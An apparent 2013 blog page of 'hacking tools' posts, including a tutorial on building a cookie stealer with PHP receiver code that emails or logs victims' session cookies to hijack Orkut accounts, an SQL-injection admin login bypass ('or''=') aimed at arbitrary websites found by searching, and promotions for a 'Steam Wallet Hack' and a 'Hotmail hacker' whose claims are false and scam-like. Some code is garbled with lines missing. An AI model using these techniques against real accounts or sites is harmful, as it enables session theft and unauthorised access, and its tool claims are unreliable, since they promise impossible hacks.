Social Icons

Apps Corner
Showing posts with label hacking tools. Show all posts
Showing posts with label hacking tools. Show all posts

Monday, 7 October 2013

Make cookies and hack Orkut accounts - How to?



    This is the simplest working way to make cookies and Hack Orkut account. To Hack Orkut account firstly you need to make a Cookie Stealer. Just follow the steps below to make cookie stealer and Hack Orkut.

What is Cookie Stealer??

    There are two components in a cookie stealer: the sender and the receiver.
    The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
    The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One:

    The Code:
    Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

    As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
    Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
    First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
    $cookie = $HTTP_GET_VARS["cookie"]; // line 2 mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3 ?> // line 4
    Line 1 tells the server that this is indeed a PHP document.
    Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
    Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
    Line 4 tells the server that the PHP code ends here.
    Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
    $cookie = $HTTP_GET_VARS["cookie"]; // line 2 $file = fopen('cookielog.txt', 'a'); // line 3 fwrite($file, $cookie . "\n\n"); // line 4 ?> // line 5
    Lines 1 and 2 are the same as before.
    Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
    Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
    Line 5 is the same as before.

Step Two:

    Implementing the Stealer:
    The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
    // Line 3
    Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
    Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
    Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
    There are two main ways of implementing the sender:
    You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

Enter as Admin of a website - How to?

1

    Do you want to Admin of a website? Is this Possible? Yes! of-course it is Friends. Now this is possible with Tricks With Hacker. Today while surfing i came across a amazing but yet simple trick by the help of which you will be able to log in as the admin of any Website.
    Note -I don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only and so that if you are a webmaster or owner of a site which is using the same username and password can than you can immediately take steps to prevent unauthorized access to your site.

How To Login As Admin Of Any Website:

    Step 1). Go To Google.com and Then Search For the Following Piece of code,
    "adminlogin.asp" or "admin.asp"
    Step 2). Now Chose any website from the search results and then fill the below details in the login page,
    Username - admin
    Password - 'or''='
    Enjoy :P
    Warning- AgainI don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only.
    Hope you liked my article do share your views in the comments below.

Trace Mobile numbers or IP-Address - How to?



    Recently I came accross a website in which we can easily trace a Mobile number. For example , when we enter the 10 digit mobile number, then we get the Mobile Service provider, Location, City along with area. Thats really awesome.
    This tool will be really helpful specially for business persons to verify the location etc...
    : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : :

Here are some screen shots from this site..

    Just Enter your Ten Digit Mobile no. in the box shown below..and Click on Submit button

    After that the Information given by this website is Shown as below::
    Its really Awesome Website..Just Click Here to open this mind blowing website..

Other Features of this site are::

    Trace Vehical Number
    Trace Pin Code
    Trace IP Address
    WHOIS Trace
    Trace Fixed Line Number & More..
    Let me know what you think about this new featured Website in the comment box.. Enjoy..!!

How to open password protected Microsoft Excel documents:



    Do you forget your MS-Excel file's Password?? Is there any way to open it?? Of-course YES my Friends. Now open any password protected Microsoft Excel file easily without knowing any password. Just follow the steps below to open your locked/password protected MS-Excel file.

How to open password protected Microsoft Excel documents:

    There are two ways to open a password protected MS-excel file without knowing it's actual Password, either by decrypting the entire excel file or by recovering the original password. I’ll summarize the steps in a simple way below.
  • Download office password recovery tool from this link.
  • Install the application with the default options.
  • Run the application and navigate to the password protected file by clicking the open button provided in the top left of the window.
  • This launches the recovery wizard.Here you can find two options.
    a) 100% instant document decryption - This method is the fastest and it strips all the password protection from the msexcel document.
    b)Recover the password to open - While this method just finds the original password of the excel file.
  • Choose any of the option and recover the password protected Excel document.
    If you have any doubts related to this trick then please feel free to ask in the comment section below. Enjoy..!!

Friday, 4 October 2013

Latest Steam Wallet Hack 2013 Free Download

Latest Steam Wallet Hack 2013 Free Download
We are today releasing our newest tool: the Steam Wallet Hack. Using this you will be able to generate Steam Wallet Codes normally written in Cards and sold in Gamestop shops.
Thanks to a vulnerability in Valve’s servers we made a reverse engineering of the code generation algorithm and decrypted their private key. With private key in our hands we can reverse everything, make Games adders, manipulate transactions…New programs will be released soon.
With the private key we even reversed the entire Steam’s engine! To demonstrate this we used Steam’s theme in our tool. Here is a screenshot.

Steam Wallet Hack Instructions

  1. Like our Free Steam Games Hack, you need to input your steam username. Your account is completely safe as it doesn’t ask for your password. Our programs will never ask for your password. If you do download a program from elsewhere that asks for your password, you should change it right away and perform a virus scan.
  2. Select the currency your Steam account uses. Normally the currency is the currency type you use in your current country.
  3. Next change the amount to the amount you wish to add to your Steam Wallet. Note, you must enter it with 2 decimal places or it wouldn’t work properly. For example, if I wanted to added $95 to my account, I would input “95.00″ without quotations.
  4. Click “Add Funds” next and wait for the status messages and loading bar. The program will alert you when it is completed.
  5. Check your Steam Wallet after using Steam Money Hack to confirm it worked. Don’t worry the program already confirms if the money is added to your wallet at the last step, you don’t need to do it again. You can check your Steam Wallet
Tags: Steam Money Adder Steam Money Hack Steam Wallet Generator Steam Wallet Generator 2013 Steam Wallet Hack Steam Wallet Hack 2013 Steam Wallet Hack Download Steam Wallet Hack Money Steam Wallet Hack No Password Steam Wallet Hack No Surveys Steam Wallet Hack rar Password Steam Wallet Hack Working,
  • steam wallet hack winrar password
  • steam wallet hack rar password
  • steam how to change money currency using cheat engine
  • steam wallet hack password for rar
  • steam wallet hack no surveys
  • steam wallet hack no survey
  • steam wallet codes free
  • steam wallet codes
  • steam wallet code
  • steam money hack password

Latest Hotmail Hacking Software 2013 free Download

Latest Hotmail Hacking Software 2013 free Download

Hotmail Password Hacker is an advanced 

Hotmail hacking application capable of hacking 
passwords at the click of a button.
With our newest Hotmail Hacker tool, you can find 
passwords super easy and very fast. Hotmail Hacker Pro can hack 
any Hotmail email account of your choice within minutes.
Features:
+ Ease of Use
+ Fast Hotmail Hacking
+ Versatility
+ Hack Hotmail Free
+  Recover a lost Hotmail password
+ ... and more.

Latest Call Recorder and Auto Answer for Skype Free Download

Latest Call Recorder and Auto Answer for Skype Free Download 

Call Recorder and Auto Answer for Skype Short Description:
MP3 Recorder for Skype conversations and Auto Answer for Skype
Call Recorder and Auto Answer for Skype Long Description:
This is MP3 Recorder for Skype Conversations and Auto Answer for Skype. May be used to record any type of Skype calls: PC-to-PC, SkypeOut, SkypeIn, conference calls. Calls may be recorded to MP3 files with CBR (48; 56; 64; 80; 96; 128; 192; 256; 320 kbit/s) or VBR. Send text message to partner on start/finish recording. Ability to mute microphone for auto answering machine. Please note: Requires Skype v5.6 or latest!
 
Publisher: PromoToMobile
Version: 1.2
License: Crack
Trial Limitations: LifeTime
Price: Free
Operating Systems: WinXP,WinVista,WinVista x64,Win7 x32,Win7 x64,Win2000,Windows2000,Windows2003,Windows Vista Ultimate,Windows Vista Ultimate x64,Windows Media Center Edition 2005,Windows Vista Starter
System Requirements: Windows XP/2003/2008/Vista/7 and Skype v5.6 or latest
File Size: 2.14 MB
Total Views: 165
Total Downloads: 0
Rating: Call Recorder and Auto Answer for Skype not yet rated. [Submit Review] 
Release Date: 11/2/2011
Last Update Date: 11/2/2013